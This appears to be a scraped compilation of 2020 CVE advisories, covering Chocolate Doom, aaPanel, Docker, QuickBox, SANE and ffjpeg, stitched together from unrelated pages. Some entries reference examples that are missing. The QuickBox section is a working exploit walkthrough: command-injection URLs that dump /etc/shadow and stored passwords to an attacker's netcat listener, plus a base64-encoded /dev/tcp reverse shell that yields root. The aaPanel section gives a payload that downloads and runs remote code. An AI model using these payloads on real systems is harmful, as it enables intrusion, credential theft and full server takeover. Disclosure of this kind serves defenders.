      0x100001519a80: 00 00 f1 f1 f1 f1 00 f2 f2 f2 f2 f2 f2 f2 00 f2
      0x100001519a90: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100001519aa0: 00 00 f1 f1 f1 f1 f8 f2 f2 f2 f2 f2 f2 f2 f8 f8
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==13660==ABORTING
    

**Fix proposition**

    diff --git a/src/net_structrw.c b/../chocolate-doom/src/net_structrw.c
    index 2dbd274..437bc71 100644
    --- a/src/net_structrw.c
    +++ b/../chocolate-doom/src/net_structrw.c
    @@ -116,7 +116,7 @@ boolean NET_ReadSettings(net_packet_t *packet, net_gamesettings_t *settings)
             return false;
         }
     
    -    for (i = 0; i < settings->num_players; ++i)
    +    for (i = 0; i < settings->num_players && i < NET_MAXPLAYERS; ++i)
         {
             if (!NET_ReadInt8(packet,
                               (unsigned int *) &settings->player_classes[i]))
    

found by Michał Dardas from LogicalTrust

CVE-2020-14983: Missing server-side num_players validation leading to buffer overflow · Issue #1293 · chocolate-doom/chocolate-doom

aaPanel through 6.6.6 allows remote authenticated users to execute arbitrary commands via the Script Content box on the Add Cron Job screen.

**aapanel****aapanel 6.6.6 - CVE-2020-14950**

*   Description : allows remote authenticated users to execute arbitrary commands via the setting menu of Sotfware Store.
*   Affected version : All <= 6.6.6

**Information**

To make this PoC, I just installed the software using docker-compose

*   Vulnerability Type : Remote command execution (Authenticated RCE)

**POC**

Go to Software Store, click on any row from the setting's field, intercept the request when you click on "start/stop/restart" and modify/edit the resquest to execute what you want. Here is an example with curl :

**aapanel 6.6.6 - CVE-2020-14421**

*   Description : Allows attacker to run arbitrary command remotely
*   Affected version : All <= 6.6.6

**Information**

To make this PoC, I just installed fresh Ubuntu 20.04, then I installed wget + sudo and executed this script wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh

*   Vulnerability Type : Remote command execution (RCE Authenticated)

**POC**

First of all, setup web\_delivery options, this will create a payload and a listener.

Now run it

this will generate the following payload:

wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown

Then copy/past like this into script content of crontab menu in aapanel.

Now just execute your crontab and wait your session.

**Fast Exploit**

Just run msfconsole -r aapanel.rc copy/paste the payload into script content section, and enjoy your session.

CVE-2020-14421: GitHub - jenaye/aapanel: aapanel 6.6.6 - (Authenticated) Remote Code Execution

An issue was discovered in Docker Engine before 19.03.11. An attacker in a container, with the CAP_NET_RAW capability, can craft IPv6 router advertisements, and consequently spoof external IPv6 hosts, obtain sensitive information, or cause a denial of service.

CVE-2020-13401: Docker Engine 23.0 release notes

QuickBox Community Edition through 2.5.5 and Pro Edition through 2.1.8 allows an authenticated remote attacker to execute code on the server via command injection in the servicestart parameter.

**Impact**

QuickBox CE <= v2.5.5 and QuickBox Pro <= 2.1.8 are both affected by an authenticated remote code execution (RCE) (_CVE-2020-13448_) and privilege escalation vulnerabilities (_CVE-2020-13694_ and _CVE-2020-13695_).  
A low-privileged user can execute arbitary commands on the server with the privileges of the user running the web server, and in turn escalate privileges to root by abusing weak sudo rules.

**What is QuickBox?**

QuickBox is a complete media server application and services management system, with a simplistic approach to achieving easy application installation and management from a beautifully designed dashboard, allowing users the ability to interact with their media server on a professional grade level.

**Versions affected**

*   QuickBox CE v2.5.5 and prior
*   QuickBox Pro v2.1.8 and prior

**Vulnerability**

Since this CVE covers two separate "versions" of QuickBox, with almost identical vulnerabilities, I have split the post into two parts; one for QuickBox CE and one for QuickBox Pro.

The vulnerability is located in the file `/inc/config.php`. This file is mainly used to setup configuration parameters to be used later by the application. At the end of this file we see that it also accept a GET parameter which will be used, unsanitized, in a call to `shell_exec`, leading to a command injection vulnerability.

Below is a snippet of the vulnerable code from`config.php`:

    switch (intval($_GET['id'])) {
    /* restart services */
    case 88:
      $process = $_GET['servicestart'];
        if ($process == "resilio-sync"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "shellinabox"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "emby-server"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "headphones"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "lidarr"){
          shell_exec("sudo systemctl stop $process");
          shell_exec("sudo systemctl disable $process");
        } elseif ($process == "nzbget"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "plexmediaserver"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "Tautulli"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "ombi"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "radarr"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "subsonic"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "transmission-daemon"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "qbittorrent"){
          shell_exec("sudo systemctl enable $process@$username");
          shell_exec("sudo systemctl restart $process@$username");
        } else {
          shell_exec("sudo systemctl restart $process@$username");
        }

Since we can control both `$_GET['id']` and `$_GET['servicestart']` we can inject our own commands into the last call to`shell_exec` and achieve remote code execution.

The complete vulnerable file can be found here: https://github.com/QuickBox/QB/blob/6f4253d82ccfdc85641fa6b27712569890687482/dashboard/inc/config.php

**Exploit**

Exploiting this vulnerability is pretty straight forward.

By sending a GET request to the following URL: `https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;<COMMAND-HERE>;` the command is executed on the server as the www-data user.

**Dump /etc/shadow**

Upon further analysis we found that the www-data user can run quite a few commands and programs as root using sudo - _without a password_.  
One of the commands that can be executed is `grep`.  
But since the output of the command executed by `shell_exec`isn't displayed on the website, we won't see any output when trying to exfiltrate sensitive information.

One way to get a around this limitation is to use grep to write the contents of `/etc/shadow` to a file we can read from and use netcat to send the file back to our listener.

If we setup a netcat listener and visit the following URL we can trigger the exploit and receive the output of `/etc/shadow`:  
`https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;sudo+grep+.+/etc/shadow+>pwds;nc+<OUR-IP-ADDRESS>+9001+<+pwds;rm+pwds;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 58814
    root:$6$lYAppqO4$ParMSRU7IDtSULWHfA4sy8iQCm9/nJP.RksoLau0zBHp0VPbOfYBipZlcQ8VVvnvArRC37r3y/hBLgYRDZ5:18406:0:99999:7:::
    daemon:*:17920:0:99999:7:::
    bin:*:17920:0:99999:7:::
    sys:*:17920:0:99999:7:::
    sync:*:17920:0:99999:7:::
    games:*:17920:0:99999:7:::
    man:*:17920:0:99999:7:::
    lp:*:17920:0:99999:7:::
    mail:*:17920:0:99999:7:::
    news:*:17920:0:99999:7:::
    uucp:*:17920:0:99999:7:::
    proxy:*:17920:0:99999:7:::
    www-data:*:17920:0:99999:7:::
    backup:*:17920:0:99999:7:::
    list:*:17920:0:99999:7:::
    irc:*:17920:0:99999:7:::
    gnats:*:17920:0:99999:7:::
    nobody:*:17920:0:99999:7:::
    systemd-timesync:*:17920:0:99999:7:::
    systemd-network:*:17920:0:99999:7:::
    systemd-resolve:*:17920:0:99999:7:::
    systemd-bus-proxy:*:17920:0:99999:7:::
    syslog:*:17920:0:99999:7:::
    _apt:*:17920:0:99999:7:::
    postfix:*:17920:0:99999:7:::
    sshd:*:17920:0:99999:7:::
    uuidd:*:17920:0:99999:7:::
    messagebus:*:17920:0:99999:7:::
    s1gh:$6$hf2vF79G$APAqRRKp4Jax27xzZE1npHlumLWaDsgaHo3z/Sw6Z3tEnemam9h.EB1pXFx1Jy9mZ/jqaQoTBlL7TphlAZb210:18406:0:99999:7:::
    memcache:!:18406:0:99999:7:::
    vnstat:*:18406:0:99999:7:::
    debian-deluged:*:18406:0:99999:7:::
    ftp:*:18406:0:99999:7:::
    shellinabox:*:18406:0:99999:7:::
    test:$6$qPhsfmxz$Jm529ZLBiigWAhcRO3svLm4HLRFZsYgkWso0dTa2d6Bxb8UJd6LuCI1AVaOutXVheu2Z2iWugRQFQLeZGCecp.:18406:0:99999:7:::
    s1gh2:$6$zaGzrHfj$1Qgs5AWlruq2YJpPFs6TjO2QNtd.WpiAV7WMV9aQE1nJKAC1LdYTh/52/HkvBeYkBhzob/E1q6JwJp6zKGRHx.:18406:0:99999:7:::
    

**Privilege escalation**

Investigating further we found that the cleartext password of every QuickBox CE user is stored in \*.db files in `/root`.  
Since we can run `grep` as root we can dump all admin and non-admin passwords, and exfiltrate the passwords in the same way we did with `/etc/shadow`. This in turn gives us a way to escalate our privileges to that of the admin user. And since the admin user can `sudo su` without a password, we can now gain root access.

To trigger the exploit, setup a netcat listener and visit the following URL:  
`https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;sudo+grep+-R+.+/root/+--include="*.info">pwds;nc+<OUR-IP-ADDRESS>+9001<pwds;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 59136
    /root/s1gh2.info:s1gh2 : Password1234 
    /root/s1gh2.info:1GB
    /root/information.info:  Seedbox can be found at https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
    /root/information.info:  If you need to restart rtorrent/irssi, you can type 'reload'
    /root/information.info:  https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
    /root/test.info:test : test 
    /root/test.info:1GB
    /root/s1gh.info:#   https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)

The information.info file will contain the admin user credentials. In this case: `https://_s1gh_:_Password1234_@192.168.1.250 (Also works for FTP:5757/SSH:4747)`

With these credentials we can now ssh into the server and escalate our privileges to the root user.

    s1gh@kali~$: ssh s1gh@192.168.1.250 -p 4747
    s1gh@192.168.1.250's password: 
    Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 5.3.18-3-pve x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    
    2 packages can be updated.
    0 updates are security updates.
    
    New release '18.04.4 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.
    
    Last login: Sun May 24 20:53:02 2020 from 192.168.1.126
     Welcome Back !
        * Dashboard:  https://192.168.1.250
        * Support:    https://plaza.quickbox.io
        * Donate:     https://quickbox.io/donate
    
    [s1gh@Ubuntu1604]:(0b)~$ sudo su
    
    
    |========================================================================|
    |------------------------------------------------------------------------|
    |  ###################   This Server is OFF limits   ####################|
    |------------------------------------------------------------------------|
         You are running QuickBox v2.5.5
         Your logged IP is 192.168.1.126:0.0
         Your BASH version is 4.3
         Mon May 25 21:16:30 UTC 2020
    |========================================================================|
    
    
    Ubuntu1604:/home/s1gh# whoami;id
    root
    uid=0(root) gid=0(root) groups=0(root)

**QuickBox Pro**

Due to a partially shared code base between CE and Pro, exactly the same command injection vulnerability can be found in the Pro version.  
The only difference is that `/inc/config.php` no longer exist and part of the source code is encrypted, so we had to manually find the injection point.

After a while we found the injection point in `index.php`.  
The exact same parameters as with the CE version can be abused to achieve RCE.

**Exploit**

By sending a GET request to the following URL: `https://<QUICKBOX-PRO-IP-ADDRESS>/index.php?id=88&servicestart=a;<COMMAND-HERE>;` the command is executed on the server as the www-data user.

**Privilege Escalation**

Since the www-data user can execute `sudo mysql` without a password, we can modify our GET request in such a way that we get a reverse shell as root instantly instead of first getting a shell as the www-data user and then doing the privilege escalation.

Our reverse shell will have a few "bad characters", so first we create a base64 encoded string of the following reverse shell: `bash -i >& /dev/tcp/<YOUR-IP>/<YOUR-PORT> 0>&1`

    s1gh@kali~$: echo -n "sudo mysql -e '\! /bin/bash -c \"bash -i >& /dev/tcp/192.168.1.126/9001 0>&1\"'" | base64
    c3VkbyBteXNxbCAtZSAnXCEgL2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xMjYvOTAwMSAwPiYxIic=

Now that we have the base64 encoded reverse shell, we can visit the following url in order to trigger the exploit (_remember to first setup a netcat listener on your chosen port_):

`https://<QUICKBOX-PRO-IP-ADDRESS>?id=88&servicestart=a;echo+<BASE64-ENCODED-STRING>|base64+-d|bash;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 46862                 
    bash: cannot set terminal process group (135): Inappropriate ioctl for device   
    bash: no job control in this shell                        
    
    
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  ###################   This Server is OFF limits   ####################|                                           
    |------------------------------------------------------------------------|                                           
         You are running QuickBox v2.5.5                      
         Your logged IP is :0.0                               
         Your BASH version is 4.4                             
         Fri May 29 07:30:25 UTC 2020                         
    |========================================================================|                                           
    
    
    
    
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  ###################   This Server is OFF limits   ####################|                                           
    |------------------------------------------------------------------------|                                           
         You are running QuickBox v2.1.8                      
         Your logged IP is :0.0                               
         Your BASH version is 4.4                             
         Fri May 29 07:30:26 UTC 2020                         
    |========================================================================|                                           
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  Just type any one of the following commands                           |                                           
    |  to turn on different bash prompts                                     |                                           
    |------------------------------------------------------------------------|                                           
    |  commandprompt_on                                                      |                                           
    |  this prompt shows last command used & more                            |                                           
    |  powerprompt_on (default)                                              |                                           
    |  this prompt shows colorful system data - cpu, load etc.               |                                           
    |  basicprompt_on                                                        |                                           
    |  this prompt shows color coded load & cpu avg                          |                                           
    |  prompt_OFF                                                            |                                           
    |  this turns off prompts and goes back to default                       |                                           
    |========================================================================|                                           
    
    
    380/2048MB      0.99 1.35 1.60 1/817 6682                 
    [21016:21015 0:37] 07:30:26 Fri May 29 [root@QB-PRO] /srv/quickbox                                                   
    (2:37)# whoami;id                                         
    whoami;id
    root
    uid=0(root) gid=0(root) groups=0(root)

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13448
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13694
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13695
*   https://www.exploit-db.com/exploits/48536
*   https://github.com/s1gh/QuickBox-CE-2.5.5-Authenticated-RCE

CVE-2020-13448: CVE-2020-13448 - QuickBox -  Authenticated RCE/Privilege Escalation

A NULL pointer dereference in sanei_epson_net_read in SANE Backends before 1.0.30 allows a malicious device connected to the same local network as the victim to cause a denial of service, aka GHSL-2020-075.

CVE-2020-12867: memory corruption bugs in libsane (#279) · Issues · sane-project / backends · GitLab

ffjpeg through 2020-02-24 has an invalid read in jfif_encode in jfif.c.

Tested in Ubuntu 16.04, 64bit.

The testcase is segv\_ffjpeg\_e2.

I use the following command:

and get:

I use **valgrind** to analysis the bug and get the below information (absolute path information omitted):

    ==12529== Memcheck, a memory error detector
    ==12529== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
    ==12529== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
    ==12529== Command: ffjpeg -e segv_ffjpeg_e2
    ==12529== 
    ==12529== Argument 'size' of function malloc has a fishy (possibly negative) value: -2097127520
    ==12529==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==12529==    by 0x4015EB: bmp_load (bmp.c:52)
    ==12529==    by 0x400F2B: main (ffjpeg.c:29)
    ==12529== 
    ==12529== Invalid read of size 1
    ==12529==    at 0x40C930: jfif_encode (jfif.c:748)
    ==12529==    by 0x400F33: main (ffjpeg.c:30)
    ==12529==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
    ==12529== 
    ==12529== 
    ==12529== Process terminating with default action of signal 11 (SIGSEGV)
    ==12529==  Access not within mapped region at address 0x0
    ==12529==    at 0x40C930: jfif_encode (jfif.c:748)
    ==12529==    by 0x400F33: main (ffjpeg.c:30)
    ==12529==  If you believe this happened as a result of a stack
    ==12529==  overflow in your program's main thread (unlikely but
    ==12529==  possible), you can try to increase the size of the
    ==12529==  main thread stack using the --main-stacksize= flag.
    ==12529==  The main thread stack size used in this run was 8388608.
    ==12529== 
    ==12529== HEAP SUMMARY:
    ==12529==     in use at exit: 33,643,096 bytes in 12 blocks
    ==12529==   total heap usage: 14 allocs, 2 frees, 33,647,744 bytes allocated
    ==12529== 
    ==12529== LEAK SUMMARY:
    ==12529==    definitely lost: 0 bytes in 0 blocks
    ==12529==    indirectly lost: 0 bytes in 0 blocks
    ==12529==      possibly lost: 0 bytes in 0 blocks
    ==12529==    still reachable: 33,643,096 bytes in 12 blocks
    ==12529==         suppressed: 0 bytes in 0 blocks
    ==12529== Rerun with --leak-check=full to see details of leaked memory
    ==12529== 
    ==12529== For counts of detected and suppressed errors, rerun with: -v
    ==12529== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)
    Segmentation fault
    

The gdb reports:

    Starting program: ffjpeg -e segv_ffjpeg_e2
    
    Program received signal SIGSEGV, Segmentation fault.
    
    [----------------------------------registers-----------------------------------]
    RAX: 0x3f800010 
    RBX: 0x7ffff000e3e0 --> 0x0 
    RCX: 0xff 
    RDX: 0x7f000020 
    RSI: 0x3f800010 
    RDI: 0xfe000040 
    RBP: 0x7ffff00103f0 --> 0x0 
    RSP: 0x7fffffffd6e0 --> 0x7fffffffd8c0 --> 0xff7f000020 
    RIP: 0x40c930 (<jfif_encode+1968>:	movzx  edx,BYTE PTR [r14])
    R8 : 0x1fc000080 
    R9 : 0x7ffff00063d0 --> 0x0 
    R10: 0x7fffffffd8c0 --> 0xff7f000020 
    R11: 0x7ffff0004ecc --> 0x105010000000000 
    R12: 0x7ffff00063d0 --> 0x0 
    R13: 0x7fffffffd770 --> 0x0 
    R14: 0x0 
    R15: 0x0
    EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x40c91c <jfif_encode+1948>:	mov    rdx,QWORD PTR [rsp]
       0x40c920 <jfif_encode+1952>:	lea    rsp,[rsp+0x98]
       0x40c928 <jfif_encode+1960>:	nop    DWORD PTR [rax+rax*1+0x0]
    => 0x40c930 <jfif_encode+1968>:	movzx  edx,BYTE PTR [r14]
       0x40c934 <jfif_encode+1972>:	movzx  esi,BYTE PTR [r14+0x1]
       0x40c939 <jfif_encode+1977>:	mov    rcx,r12
       0x40c93c <jfif_encode+1980>:	movzx  edi,BYTE PTR [r14+0x2]
       0x40c941 <jfif_encode+1985>:	mov    r9,rbp
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffffd6e0 --> 0x7fffffffd8c0 --> 0xff7f000020 
    0008| 0x7fffffffd6e8 --> 0x7fff00000000 
    0016| 0x7fffffffd6f0 --> 0x1fc000080 
    0024| 0x7fffffffd6f8 --> 0xfe000040 
    0032| 0x7fffffffd700 --> 0x7fff00000100 
    0040| 0x7fffffffd708 --> 0x7f000020 
    0048| 0x7fffffffd710 --> 0x7ffff00008c0 --> 0xff7f000020 
    0056| 0x7fffffffd718 --> 0xff000000ff00 
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    jfif_encode (pb=pb@entry=0x7fffffffd8c0) at jfif.c:748
    748	            rgb_to_yuv(bsrc[2], bsrc[1], bsrc[0], ydst, udst, vdst);
    gdb-peda$ bt
    #0  jfif_encode (pb=pb@entry=0x7fffffffd8c0) at jfif.c:748
    #1  0x0000000000400f34 in main (argc=argc@entry=0x3, argv=argv@entry=0x7fffffffd9c8)
        at ffjpeg.c:30
    #2  0x00007ffff7a2d830 in __libc_start_main (main=0x400be0 <main>, argc=0x3, 
        argv=0x7fffffffd9c8, init=<optimized out>, fini=<optimized out>, 
        rtld_fini=<optimized out>, stack_end=0x7fffffffd9b8) at ../csu/libc-start.c:291
    #3  0x0000000000401019 in _start ()
    

An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service (DoS).

Tag

#ubuntu